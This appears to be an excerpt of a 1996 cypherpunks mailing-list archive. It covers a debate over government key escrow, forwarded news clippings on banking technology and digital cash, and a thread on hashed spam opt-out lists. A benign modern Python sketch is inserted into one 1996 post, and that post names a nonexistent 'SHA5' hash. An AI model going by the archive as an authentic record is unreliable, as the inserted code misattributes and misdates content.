> |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union |
> |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = |
> |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
> +---------------------+--------------------+----------------------------------+
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From vznuri at netcom.com Tue Sep 17 23:59:43 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 18 Sep 1996 14:59:43 +0800
Subject: The GAK Momentum is Building...
In-Reply-To:
Message-ID: <199609180338.UAA27100@netcom15.netcom.com>

[business key management plans/infrastructures]

>However, making the government a _required_ part of such plans implies a
>motive that is not at all the same as what companies wish (mostly, disaster
>recovery).

the distinction lies in the terminology. what does it mean, "required part of the plan". if it essentially amounts to nothing more than the government saying, "you must give us keys when we present you with a subpoena/warrant", then that's no different than the system we have today. again, granted, laws specifically aimed at crypto can tend to take up a life of their own. but my main point was that the gloom-and-doom peddled by you and lucky green over clipper just doesn't mesh with the actual events. the government has visibly had to *backpedal* *numerous* times in all of its clipper proposals. I see no evidence that the latest proposals are going to be any different.
what annoys me is people who are crying wolf all the time, and even when it seems there are no wolves around, or they have temporarily receded, they say, "I told you so". "the wolves really are going to devour you, just you wait and see"

And, as has been noted so many times by so many of us, whatever
>the motivations for corporate key escrow systems for disaster planning are,
>there are no motivations for key escrow for _communications_. If the sender
>dies, or leaves, or whatever, the company can reconstruct his
>communications from _his_ key. Or the receiving side can reconstruct the
>recipients messages from _his_ side.

this doesn't parse to me. the simple situation that may occur: employee [x] creates a key on behalf of company [y]. employee [x] forgets or misplaces the key. company [y] needs to retrieve key, and cannot go to other company to get it (imagine situations such as encrypted internal files, for example, although it holds equally well for communications-- it would be very embarrassing to ask another company for the key to decode something you sent them because you misplaced it). I think cpunks tend to blur and obfuscate this use of crypto-- i.e. nonpersonal use within companies. what you seem to be saying is that companies should not have to escrow keys involving communications. i.e. the communications should be readable only between the communicators. but this makes no sense to me either. companies wish to have permanent record of all official correspondence. they don't send messages and then don't keep them around, like guerilla cypherpunks spend all day doing. ("YIKES!!! that msg has been on my hard drive 5 minutes!! better delete it FAST")

>The only party interested in having access to "in transit" communications
>are the wiretappers and SIGINT folks. Think about it. No company I can
>think of is interested in reconstructing messages from the _actual
>communications_, only from the keys of employees.

bzzzt. "actual communications" == records of transactions between companies. we are talking about everything that companies send back and forth: bills, contracts, agreements, etc.-- virtually everything that companies send each other, they keep on permanent record.

The NSA and FBI, however,
>are _keenly_ interested in reconstructing messages from intercepts, of
>course, and hence are pushing for escrow of _communications_ keys!

hmmmm, this distinction you are now promoting of communication keys, vs. whatever other kind there are (backups?) is something I've not noticed you or others emphasize before, I would have to think about it. frankly I don't see a whole lot of difference between what you are calling "communication" keys and whatever else crypto is used for. look, consider this: the government got its tentacles into every business key database in existence, in the sense they can easily open them when they get wiretaps/warrants. yet individuals were still free to send crypto everywhere. how would this be much different than today's system, other than that the government has more efficient access once the order is granted?

>Furthermore, the main worry (for me, at least) is that the government hopes
>to get its Clipper IV scheme accepted (by means of export laws) at some
>large fraction of important corporate accounts, not the least of which will
>be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
>in the "infrastructure" business. Once most of these have "bought off" on
>GAK, pressure will be intense to universalize the process, to make it a
>felony _not_ to use a "Key Authority."

that's a big, big leap, the kind that cpunks always love to make to sell you on the dystopian orwellian nightmare they are always ranting about. the things that companies use keys for can be pretty different from what individuals would use them for. the government can already get any info it wants through a subpoena or warrant from a company, and they will comply.
how is this different than what you are referring to? you are making a leap that if companies have internal key infrastructures to protect their information, that the restrictions on them will automatically carry over to private communications between individuals such as in e.g. a telephone like scenario. look, we already today accept that employee's liberties do not necessarily hold within a company. the concepts of "freedom of speech," "privacy" etc. do not necessarily hold within companies.

>(BTW, I predict that the tainted term "key escrow" is now gone from the
>official lexicon. I haven't seen the Clipper IV proposal, but I surmise
>that the baggage the term "key escrow" carries means that some more
>benign-sounding term will be used in the final proposal. Something like
>"Key Recovery System." You heard it here.)

I hate the misuse and abuse of the english language in Orwellian fashion (The Great Plan to Protect the Integrity of Data Communications) as much as you do, but there are some very significant distinctions that are being glossed over. the new proposals are radically more diffused than the original clipper plan imho. the government is clearly in the process of backpedaling. it's got all the signs of desperation imho. if they didn't succeed with the original clipper, what makes you think the more recent proposals are all that sinister and likely of succeeding? you evade my basic point: perhaps in all the key escrow language in the bills, it would all boil down in practice to, if we have a subpoena or a warrant, you have to give us the keys. how is that different than what we have now?

cpunks -- I am not an apologist for clipper. but I want everyone to realize that to promote crypto, you have to intrinsically support some things like a robust key infrastructure. who is going to provide it? do you think that whoever does will be *exempt* from warrants and subpoenas? that is not a system that we have now, nor is it likely we ever will.
moreover, few but only the most ardent extremists would argue such a system would be incompatible with "freedom" as we understand it in this country. "government == evil" is a very simplistic outlook in life that can come back to bite you bigtime, imho. there are some people in government that share cpunk views and could do some good if they weren't lumped in with the evil spooks who really are trying to enslave humanity (hee, hee) From shamrock at netcom.com Wed Sep 18 00:00:42 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 15:00:42 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > However, making the government a _required_ part of such plans implies a > motive that is not at all the same as what companies wish (mostly, disaster > recovery). The required part will come later. Meanwhile, many big players in the industry are volunteering to include GAK for you. When I asked the fellow from HP that proposed the CommerceNet position paper how the "voluntary key recovery" he was proposing on his slides could possibly aid law enforcement against criminals who obviously wouldn't "escrow" their keys, he said, and I am not kidding: "There are many possible interpretations of the words voluntary and mandatory." I was the *only* person in a room full of people working in the industry that seemed bothered by this. > Furthermore, the main worry (for me, at least) is that the government hopes > to get its Clipper IV scheme accepted (by means of export laws) at some > large fraction of important corporate accounts, not the least of which will > be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players > in the "infrastructure" business. Once most of these have "bought off" on > GAK, pressure will be intense to universalize the process, to make it a > felony _not_ to use a "Key Authority." That's exactly how it will be. 
> (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) Correct. As I explained in my post from the CommerceNet meeting in D.C., "key recovery" is the new politically correct term for GAK. --Lucky From dlv at bwalk.dm.com Wed Sep 18 00:02:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:02:43 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: Financial Times: Wednesday, September 4, 1996 IT: A Spider's Web for the Banking Sector Interview with Joseph De Feo By Paul Taylor The influence of network computing and other technologies extends into all aspects of the industry. Barclays' director of group operations and technology believes it will have a profound effect on traditional banking. 'It's going to change the whole way business is conducted,' he forecasts Joseph De Feo has built up a formidable reputation as an effective business leader and banking visionary since he joined Barclays Bank as director of group operations and technology nearly seven years ago. American-born Mr De Feo, who joined Barclays from merchant bankers Morgan Grenfell after spells with both Goldman Sachs, the Wall Street investment bank, and Chase Manhattan, the third-biggest US bank, is also widely regarded as one of the banking industry's most outspoken, and influential, IT users. He believes the main issue facing the banking industry is the impact of electronic delivery mechanisms and the changes which will be wrought by introducing electronic delivery to replace physical branch delivery in retail banking services. 
But although he believes changes in retail banking may be the most visible, he says the impact of the broader capability of networks and networking will be just as dramatic on the wholesale and investment banking business. "It is engendering a situation in which there will be a wholesale reconstruction of the value chains in the business model for the industry, where you could envision networks of specialist companies, each focused on a specific area - say research, analytics, trading, investment banking, distribution. . . "This sort of change has actually occurred in other industry sectors - the commodity end of the business is being concentrated into a smaller number of global producers, and the rest of the business is being fragmented among many thousands of very focused and specialised players." He believes that, faced with such challenges, banks will adopt different strategies. Some, such as JP Morgan in the US, will quit the "manufacturing" end of banking, and sub-contract out the processing. Others will specialise in transaction processing, in much the same way that National Westminster Bank is providing the back-office capability for supermarket chain Tesco's recently-launched loyalty card in Britain. Overall, he thinks the number of jobs in retail banking will fall as capital is substituted for labour. "I think the aggregate labour content in all aspects of the business will go down, but not at the same rate as it will in retail banking." In Britain, he warns, the adjustment will be disproportional, "because we hesitated on the capitalisation of the automation of the branch networks." Delaying automation of the traditional branch networks could also make it more difficult for the banks to respond to new and often lower-cost competitors, including retailers such as Marks and Spencer and Virgin which do not have the same infrastructure costs. In addition, he notes, it takes time to respond to new competition and new delivery channels. 
"You still have to support the branch network. The more inefficient that branch network is, the higher the burden of cost - so you are really stuck if you have huge costs." Unlike some of his colleagues, however, Mr De Feo does not believe that bank branch networks will disappear overnight. "When I first joined the group, lots of people were saying we need to cut the branch network in half in the long run. It was a real big issue - we were obsessed with the numbers of branches. I kept saying to them that you have to start on a more rational base and judge what is effective for the group to have as a physical branch distribution network." While he believes the bank's branch network is still costing a lot more, probably five or six times more, than it ought to, he argues that the decision on an individual outlet "could change very dramatically if the branch was much cheaper to keep open." "We have not closed nearly as many branches as people had originally thought we were going to, because the cost of us having an outlet open is much lower than many other banks," he says. Barclays has cut the cost of its branches "by reducing the labour content, by having more customer volume go though each branch, so that the effectiveness and efficiency of an outlet is improved." He notes that in the US, "if you count electronic branches, there are more branches opening - they are not closing branches. . . the individual cost of those locations is a fraction of what it is in this country." Even with the advent of electronic purses and smart cards, Mr De Feo believes there will still be a need for physical bank outlets. "We really need physical bits of paper in our hand to do business. . . so it is going to take a long time to get rid of the physical locations; probably 25-30 years." Ahead of that, he believes there could actually be an increase in bank outlets. 
"I would predict that you will see an increase in penetration in supermarkets of electronic branches, or [branches] where there is one person, in this country. "I think you will see more express branches like we have just put up in Tunbridge Wells, which will either be semi-manned or unmanned." He thinks these low cost "convenience branches" will be supplemented by telephone banking, or banking via a digital television or via personal computer. "We had better do it because we are going to struggle strategically to keep our branch identity, the way things are going," he says. "We have got strong branch identity in the industry, but that could be usurped very quickly, especially for the traditional products because we don't satisfy primary needs." Mr De Feo makes his point using a potential car buyer as an example. "If you need to borrow money for a car, it is not because you want to borrow money, it's because you want a car." If, as is beginning to happen, car manufacturers bundle in the financing, "why would you bother to go to a bank?" If the carmaker has a good credit rating, it can raise money cheaper than the banks - so it is sensible for the carmaker to arrange the finance because it can make an additional small profit on the loan. Like other large financial institutions, Barclays is a big IT spender. But does Mr De Feo think that the bank gets value for money? "I think that in Barclays we are now getting to the point where we are - and it shows in our results, and in the recognition we are getting, and the way in which the business attitude towards IT has changed. The level of suspicion that IT was sort of a thing that was on its own, and spending money because they wanted more toys, is dissipating. "If you look at the core businesses of the group, whether you are talking about BZW or the asset management business, we are now much more thoroughly integrated in terms of how technology is being used. 
We have still got a way to go because we are not on an appropriate strategic platform because the knowledge gap is still there and we need to understand better how these technologies are going to transform business. Sophisticated banking IT systems, such as those used in credit behaviour scoring, knowledge-based techniques and corporate lending assessment, are now commonplace. "IT has improved the quality of our lending, our decision-making, our communication with our customers, because it is clearly more objective. It is more explainable; it is not like I turned you down for a loan because I don't like the look of you." He believes the relationship between banks and the IT vendors has also changed. "It is a matter of choosing partners now," he says, "the functional differences are less significant in vendor selection than they used to be." Mr De Feo argues that one of the biggest challenges facing the financial services sector is ensuring that the wide variety of legacy systems work together. "That glue - how you get the network of these applications brought together - is extraordinarily important. Mr De Feo says that IT users need infrastructure standards which would allow different proprietary technologies to be brought together. "The Internet offers some of it but the Internet is weak in systems management and security. The most important aspect of the Internet is that it has given a glimmer of what is possible with network-based computing. "It is like a very weak light-bulb going on in an absolutely dark room, and what I worry about is that we will not be able to fulfil the promise because there are so many holes in the management and the security side of it. 
"We are OK now because it is being used as an information dissemination vehicle, and an e-mail vehicle, but when we start doing serious applications using that technology it's all going to bubble to the surface and we're going to see the same sort of problems with the Internet as enterprises are having in gluing together computer systems that were built on IBM or Digital Equipment technology." Eventually, Mr de Feo believes Microsoft will produce the "glue" to bind disparate systems together, but he cautions: "It is going to be very hard for Microsoft because it is going to push them into spaces they have never occupied before." Similarly, he believes that the real potential of network computing will only be realised if it enters the commercial sphere. He says: "That will only happen if the financial services element is solved. We have got to get all that sorted out, so all of this has got to be brought together at some point soon, otherwise things will go into a slowdown until they get resolved. "There are all sorts of initiatives to work on: the security, and work on the systems management, and so on. But the cohesiveness of those efforts is not apparent." Ultimately he believes network computing and other technologies will have a profound effect on traditional banking. "It's going to change the whole way business is conducted," he says. "The influences of all these technologies extends like a spider's web out into all aspects of the industry." Financial Times: Wednesday, September 4, 1996 Global Finance Sector Maintains Its IT Edge By Paul Taylor >From Internet banking and multimedia kiosks to electronic trading rooms and risk management systems, the future of the global financial services industry is inextricably linked to information technology. 
The financial services sector is already one of the biggest spenders on information technology -- spending made necessary not just to reduce costs, but also to maintain an edge in an increasingly competitive market where new entrants and new channels to market are eroding traditional boundaries. For example, in the insurance sector, Datamonitor, the market research firm, predicts that 95 per cent of the UK's largest insurance intermediaries will have direct operations by 1998. Datamonitor also believes that by 1998 some 70 per cent of insurance companies will have Internet sites. The intensification of competition within the financial services sector reflects the deregulation of the industry which has attracted new entrants. Other factors are globalisation and technology which have swept aside barriers to entry and lowered the cost of doing business. As a result, in order to thrive in the 1990s, financial service organisations are as much in the business of managing and manipulating information as managing and making money. "Our industry is information based - it is absolutely essential - and the relationship of technology management, technology usage and business management is one of the critical skills," says Joseph De Feo, director of group operations and technology at Barclays bank. "If people in financial services companies say they don't understand technology, or are afraid of technology, it is just like saying 'I am not qualified to do my job'," says Mr De Feo. The fate of many financial institutions, as they gear up to face this new competition, will depend on the successful deployment of data processing resources, telecommunications systems and software. "The financial services industry is faced with unprecedented challenges - increasing competition, a technology revolution, a highly unpredictable economic and political climate, consumerism and rapidly evolving legislation," said Andersen Consulting in a recent report*. 
John Reed, chairman of leading US commercial bank Citicorp, has expressed concern that banks and securities firms risk being reduced to "a line or two of application code on a network." Such concerns are understandable given the competitive pressures that banks and other financial institutions now face. "Financial services companies are trying to drive down or stabilise costs," says Ian Peackock, a consultant with Logica, the UK-based computer services group. "Another big area for them is systems integration." "When the banking history of this century is written, the decade from 1990 to 2000 will be seen as the defining moment," said Price Waterhouse in a recently published report on the challenge of virtual banking. "A new generation of non-bank competitors poised to harness new forms of technology could radically alter the structure of the traditional banking system as we know it. Today, opportunities are being exploited by software companies, consumer companies and even large and influential media owners. The threat to the traditional 'bricks and mortar' banking system is very real." In America, US telecoms group AT&T became the second-largest card issuer in the world with more than 15m accounts in just five years. Ford Motor, which now generates 20 per cent of its US revenues from financial services, now positions itself in the UK as "the branchless bank". Business Week magazine noted: "Banking is essential to a modern economy. Banks are not" -a view echoed by Bill Gates, chairman of Microsoft, who warned: "Banks are dinosaurs. Give me a piece of the transaction business and they are history." Meanwhile, the IT specialists at Deloitte & Touche argue that "Technology will change the retail banking industry fundamentally in the years to come." 
They believe that banks will lose their monopoly as centres for money transmission - in other words, the activity of transmitting money from one person or company to another will increasingly be carried out by a variety of competing providers. In addition, distribution channels for retail banking products will proliferate. "Whereas in the past the bank branch was the only channel for distributing most financial services products, in the future a number of different channels will continue to erode the branch's predominance," say Deloitte & Touche. Finally they argue that the fully integrated bank will fragment into specialist categories. Braxxon Technology, an IT management and systems consultancy, estimated recently that leading international banking institutions face a combined IT bill of $ 4bn to replace their existing global trading settlement systems for bonds and equities. After a survey of large banks, Braxxon concluded that the top 50 world investment banks would need a global investment of at least $ 80m each to replace existing settlement systems which have failed to keep pace with business and regulatory requirements. The survey also revealed that 30 per cent of banking systems are more than 10 years old - and three out of every five banks have already started replacing their systems. Financial institution spending on IT is also likely to be increased over the next few years in order to tackle issues such as the so-called millennium problem which affects older software, much of which is running on mainframe machines. Ultimately, as the worlds of information processing and financial services collide, most financial institutions realise that they have little choice but to increase their IT expenditure while ensuring that they use technology as efficiently as possible to deliver their customers fast, flexible and competitively priced services. *Financial Services in a Virtual World. 
Forbes ASAP: August 26, 1996 The Money Changers: Digital cash Innovators Sholem Rosen: Citibank V.P., Emerging Technologies SHOLOM ROSEN heads Citibank's emerging technologies group, which has devised a digital cash system. Rosen invented the technology, slated to be released in late 1998, that will make possible the electronic management of cash. The 55-year-old Rosen, a former math professor at Johns Hopkins University, talked with FORBES ASAP's Lee Patterson about Citibank's digital cash plan. ASAP: What has Citibank developed that's different from other electronic money technology? ROSEN: We've developed EMS, which stands for Electronic Monetary System. It allows you to transact personal or commercial business without the need of a third party. If you pay me $10 for a good or service, the money goes directly to me -- it doesn't go through a bank. EMS supports all currencies, so you could pay someone in yen, dollars or marks. In our system, the money circulates just like cash, except our "EMS note" carries a complete audit trail. If your e-money is lost or stolen, it can be redeemed. ASAP: Software companies are aggressively pursuing the electronic commerce and banking markets. How do you think Citibank's name will stand up to the likes of Microsoft or DigiCash? ROSEN: Citibank understands consumer marketing. Every card in my wallet has the Citibank brand name on it. You may not be loyal to your bank yet, but the idea is to make you loyal by providing services that make your life a lot easier. If Microsoft or another software company wants to be a competitor, it's still going to have to sign up with banks to do business. Internet money is not going to be of any value if you can't turn it into real money you can use in the physical world. You have to go through the banking system to do that. ASAP: How did you feel a year ago when you heard the plans for a Microsoft/Intuit merger? ROSEN: Personally, I didn't think much of it at all.
I believe banks are more concerned they'll be captive to what technology companies deliver to the consumer rather than having their businesses taken over. ASAP: But why will consumers come to Citibank for their technology needs when they can go to Microsoft or Intuit? ROSEN: Because Citibank has better technology. We give away our home banking software, and it's much more functional than anything you're going to pay to get from Intuit. Technology companies are definitely competition, but we have been approaching electronic money from an application standpoint and applying technology to it -- not the other way around. ASAP: Much of the focus of e-money technology centers on security. How secure is Citibank's system? ROSEN: Security has to be in the hardware, not the software. Our security is built into a proprietary chip we've developed. We're going to use cryptography that only national labs will be capable of breaking. I would let all the hackers in the world take their cracks at our system. ASAP: Will e-money replace the coin and papernote system we use today? ROSEN: We're not here to replace paper money. Our system will be valuable on the Net. Internet transactions are flaky now. We're trying to take the flakiness out of it. We want to give the user more of the feeling of trust and security experienced in the physical marketplace. ASAP: What's the federal government's role in electronic money? ROSEN: They're watching. They're letting people experiment. The official party line is "We're going to keep our hands off and our nose in." ASAP: Will digital cash make it easy to launder money or evade taxes offshore? ROSEN: It's true that with e-money, geography is gone. All the laws that have been created here and abroad have been based on geography. Two-thirds of our currency now is abroad. So what's the big deal if [e-money] moves abroad? With our system, the feds will have a lot more control over what's going on than they do with the present paper currency system. 
EMS notes will leave electronic audit trails, and their circulation can be blocked if the system detects that they've been tampered with or duplicated. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 00:04:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:04:41 +0800 Subject: Spam blacklist project In-Reply-To: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net> Message-ID: Greg Broiles writes: > At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote: > > >I'd say it's a safe bet that the unscrupulous could easily sell a large, > >up-to-date list of email addresses of people who DON'T want junk email to > >people who want to send such mail. > > That's why the list should be distributed (as the original poster > mentioned) in hashed format - the junk email people would then hash their > own list(s), and would know not to send to addresses where the hashes > matched. The unmatched hashes addresses on the "block" list aren't > otherwise useful to the junk e-mail folks. That's an excellent idea! Store the SHA5 of the do-not-e-mail addresses and have the scrubbing program compute SHA5 of the addresses on the spammer's list and delete the ones that match. I guess, fold the case and normalize the %-hacked addresses. > It's an interesting idea .. but who is going to pay for it? (doh.) Not one of the spammers. Perhaps someone at an .edu site. Perhaps some ISP, for free publicity. I'd expect that the service would get a lot of e-mail traffic for the first few weeks, while everyone who cares about it would get their addresses on the list; and then it'll be just another FTP server. 
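The hashed block list discussed in this thread, sketched as an added example that is not part of any poster's message. It assumes Python with SHA-256 from hashlib standing in for the hash, reads "%-hacked" as the `user%host@relay` routing form, and uses hypothetical function names and constructed sample addresses.

```python
"""Hashed do-not-mail list: the operator publishes digests, never addresses."""
import hashlib


def normalize_address(addr):
    """Canonicalise a bare address so equivalent spellings hash identically."""
    addr = addr.strip().strip("<>").lower()      # fold case, drop <...> wrapper
    local, at, domain = addr.rpartition("@")
    if not at:
        raise ValueError("no @ in address: %r" % addr)
    # Percent hack (assumed meaning of "%-hacked"): user%host@relay is mail for
    # user@host routed via relay. Each relay turns the rightmost % into @, so
    # peel routing hops off until only the final mailbox remains.
    while "%" in local:
        local, _, domain = local.rpartition("%")
    if not local or not domain or "@" in local:
        raise ValueError("malformed address: %r" % addr)
    return local + "@" + domain


def address_digest(addr):
    """Hex SHA-256 of the normalised address (SHA-256 is an assumption)."""
    return hashlib.sha256(normalize_address(addr).encode("utf-8")).hexdigest()


def build_blocklist(opt_out_addresses):
    """What the list operator distributes: a set of digests only."""
    return frozenset(address_digest(a) for a in opt_out_addresses)


def scrub(mailing_list, blocklist):
    """Split a mailing list into (kept, dropped).

    An entry is dropped when its digest is on the block list. Entries that
    cannot be parsed cannot be checked, so they are dropped too (fail closed).
    """
    kept, dropped = [], []
    for entry in mailing_list:
        try:
            blocked = address_digest(entry) in blocklist
        except ValueError:
            blocked = True
        (dropped if blocked else kept).append(entry)
    return kept, dropped


# Constructed sample data (not from the thread).
OPT_OUT = ["Alice@Example.COM", "bob%inside.example@relay.example"]
MAILING_LIST = [
    "alice@example.com",              # same mailbox, different case
    "<BOB@inside.example>",           # same mailbox without the routing hop
    "ALICE%example.com@gw.example",   # same mailbox behind another relay
    "carol@example.org",              # never opted out
    "not-an-address",                 # unparseable
]


def demo():
    return scrub(MAILING_LIST, build_blocklist(OPT_OUT))


if __name__ == "__main__":
    kept, dropped = demo()
    print("kept:", kept)
    print("dropped:", dropped)
```

Because addresses are guessable, an unsalted digest hides an address only from someone who cannot already guess it, so the published list still deserves some care in handling.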
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 00:10:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:10:13 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: American Banker: Tuesday, September 10, 1996 Two German Companies Tap U.S. Smart Card Market By VALERIE BLOCK Two German smart card manufacturers that have set their sights on the United States are finding the market big enough for two different strategic approaches. Gieseke & Devrient America Inc., subsidiary of a German currency printer, has become a major supplier of Visa Cash cards, firmly entrenching itself in the world of banking applications. Orga Card Systems Inc., whose German parent is owned by three corporations in that country, is going after the telecommunications industry here. In August, Orga secured a million-card minimum commitment from Omnipoint Corp. for the new digital mobile phone technology known as personal communication services. The deal, covering the New York area, could mean as many as three million cards over three years. Smart cards, with embedded computer chips, contain customer account information and would be used to activate the mobile phone. Orga inked a deal last fall with American Personal Communications, another provider of personal communications services, to supply smart cards for its Sprint Spectrum service in the Washington area. "We're big in telecommunications," said Holger Mackenthun, president of the U.S. Orga operation in Paoli, Pa. "That's where most of the (smart card) applications are." Benjamin Miller, chairman of CardTech/SecurTech, the Rockville, Md.- based conference organizer, called Orga a "major worldwide player" in global standard for mobile telecommunications, or GSM, the international version of the digital mobile phone network. 
Gieseke & Devrient, with a 150-year history of currency printing, "is tied culturally to the financial industry," said Joseph Schuler, senior vice president of Schlumberger, a leading French smart card company with operations here. Schlumberger and its home-country competitors, Gemplus and Bull Group, supply the lion's share of smart cards in the United States and around the world. Still, Mr. Schuler said the expansion of the U.S. market will create opportunities for all the manufacturers. In supplying 800,000 cards to NationsBank for the Olympics Visa Cash pilot in Atlanta, Gieseke & Devrient established a firm alliance with Visa. It is vying to participate in the New York smart card test scheduled to begin early next year with Visa, MasterCard, Citicorp, and Chase Manhattan Corp. The German company also supplied card-dispensing machines to Wachovia Corp. for the Atlanta pilot and 5,000 Visa Cash cards for BankAmerica Corp.'s limited-edition Olympic series. R. Kirk Brafford, program manager, Gieseke & Devrient in Reston, Va., said since his hiring in 1994, he has laid groundwork, established relationships, and generally spread the word about the company. "Things started to kick in last fall with Visa Cash," he said. While profits have not yet materialized for U.S. operations, its German parent, Gieseke & Devrient GmbH posted $240 million in card revenues for 1995. Orga's German parent, Orga Kartensysteme GmbH, garnered $85 million in card revenues for 1995. Mr. Brafford said Gieseke & Devrient has been a global standard for mobile telecommunications pioneer in Germany and elsewhere. It competes for personal communication services applications as well as prepaid phone cards and other telecommunications applications, but it has been held back by a fastidious "quality orientation," said Mr. Miller.
Over-the-air initialization for digital mobile communications had not been standardized, so Gieseke & Devrient didn't offer the feature that other companies, like Orga, promoted through proprietary means. Mr. Brafford said a standard was recently put in place, and the company will offer the feature soon. He also said the organization is working with several satellite communications companies to supply smart cards for their activation systems. Orga -- owned by Preussag, a giant German steel maker; Bundesdruckerei, a federal printing company comparable to the U.S. Mint; and Detecon, a consultancy owned by Deutsche Telekom, Deutsche Bank, and Dresdner Bank -- was formed 11 years ago as a smart card producer for global standard for mobile telecommunications and prepaid phone applications. It has been less aggressive in the financial services industry. Several industry sources said Preussag is dissatisfied with the company and wants to divest. Mr. Mackenthun said the steel maker may indeed sell its shares to the other two owners, to better concentrate on its core business. Orga also suffered a setback in its attempt to secure a card manufacturing base in the United States. It announced a joint venture last year with Kirk Plastic Co., which could have given Orga a U.S. presence similar to those of Gemplus or Schlumberger. That deal fell through, and last month Kirk Plastic, the second-largest bank card producer in the United States, was sold to Francois-Charles Oberthur, a French currency printer that co-owns a smart card operation with Bull Group. Kirk Hyde, president of Los Angeles-based Kirk Plastic, said Orga was stumbling in the banking arena, but other observers said financial differences split the companies. Though Orga supplied 20,000 reloadable, stored-value cards for MasterCard's Australian smart card pilot, the company is not bidding on the New York test. Mr. Mackenthun said that was because it cannot produce cards and personalize them here. Still, Mr. 
Mackenthun is optimistic that Orga will either purchase another plastics maker or set up personalizing facilities of its own in the near future. Gieseke & Devrient acquired Security Card Systems of Toronto earlier this year and has a plant in Mexico City. It expects to purchase a U.S. facility as well. Through its Toronto facility, it will manufacture cards for Mondex's Canadian issuers. InformationWeek: September 9, 1996 Wall Street Sharing Data To Get An Edge By Udayan Gupta If you listen to all the media stories about Wall Street and technology, you may come away convinced that preparing systems for the year 2000 is subsuming all other technology projects in the financial community. Nothing could be further from the truth. Sure, making the year 2000's two-zero datefields work is a nagging headache. But a bigger concern for Wall Street is how to keep pace with technology without tearing apart the whole organization. How does a company adopt the latest systems and software, train users, and still not miss a beat in its regular business? The choice for many financial services companies is to expand the use of and access to technology within the organization, focusing on connectivity and improved productivity. "We aren't slowing down on the introduction of technology. We simply are stepping up our technology training," says Howard Sorgen, CIO at Merrill Lynch & Co. in New York. Speed and data availability have been the key competitive elements for financial services companies. To gain an edge in these areas, companies have experimented with a wide array of technology. But such experimentation has taken place with little internal coordination, leaving large financial institutions with disparate and confusing systems. Not surprisingly, financial services companies are consolidating their technology, says Jim Ogorchock, business development manager for financial services at EMC Co., a Hopkinton, Mass., data storage provider.
Consolidation has meant finding ways to disseminate data and information across the enterprise and making data easier to use, he explains. There is greater emphasis on data warehousing, for example, and on finding ways to make data more accessible. ESI Securities Co., a New York broker that specializes in trading technology, is also looking for ways to make data more accessible to more people. "We have moved from being a linear information process to an integrated process," says Jeanne Murtaugh, ESI's vice chair. Instead of different people handling data at various points in the chain, one person can have access to all data at once, dramatically cutting the time it takes to act on the data. At many financial institutions, the focus is on expanding choice and connectivity, says Murtaugh. ESI has found that there is big demand for its trading products and services because they give users greater flexibility and are compatible with other systems.

Not The Enemy

Connectivity also is being sought through the Internet, says Matt de Ganon, president of K2 Systems, a New York Internet access designer. "Financial services companies are recognizing that the Net isn't an enemy competing to provide services. It's an additional conduit," de Ganon says. He adds that a growing number of financial services companies are willing to use the Internet to provide data to investors. The Internet is also seen as a transactional tool, one that allows data gathering and information dissemination at a more rapid and cost-efficient rate. Equifax Inc., for example, plans to make credit data available to its subscribers on the Net, providing easier access to the data at vastly reduced prices, says Dan McGlaughlin, president and chief technology officer of the Atlanta company. Equifax keeps credit information on nearly 200 million U.S. consumers. Acceptance of the Internet as an integral business tool is only part of the change at financial services companies.
Many of them are abandoning proprietary software and hardware for more generic solutions, especially if those solutions provide the choices and connectivity that companies need. Technology users are searching for a common platform that can provide ready solutions and is easily scalable, says Jonathan Wolf, VP of marketing and sales for Track Data, a New York provider of market data systems. Increasingly, IT executives at financial services companies are looking at a Windows NT environment, Wolf says. Many of the companies that traditionally have had Unix environments -- such as First Boston and J.P. Morgan -- are looking for greater connectivity. They are implementing off-the-shelf solutions instead of insisting on proprietary systems, Wolf adds. Nowhere is this desire for choice and connectivity more intense than at Merrill Lynch, the financial services company with the highest annual IT expenditure. This month, Merrill Lynch will launch Trusted Global Advisor, a technology platform for its financial consultants. The system consists of 25,000 IBM multimedia PCs using the Microsoft Windows NT operating system and linked by 1,200 servers. Using the NT platform "allows us to buy our applications rather than build," says CIO Sorgen. Merrill Lynch still uses Unix for industrial-type applications such as data-intensive analytical computation, but NT will become the norm for retail applications, he adds. By turning to off-the-shelf applications, Merrill Lynch hopes to cut the cost of technology consultants. In order to hasten the use of new technology, the company relied heavily on outside consultants. Indeed, almost 20% of the company's IT expenditures over the past five years went to pay for outside help, says Sorgen. Now Merrill Lynch is looking to widely available solutions and in-house training to sharply reduce its technology personnel cost.

Keeping Control

Not that the company wants to avoid everything proprietary.
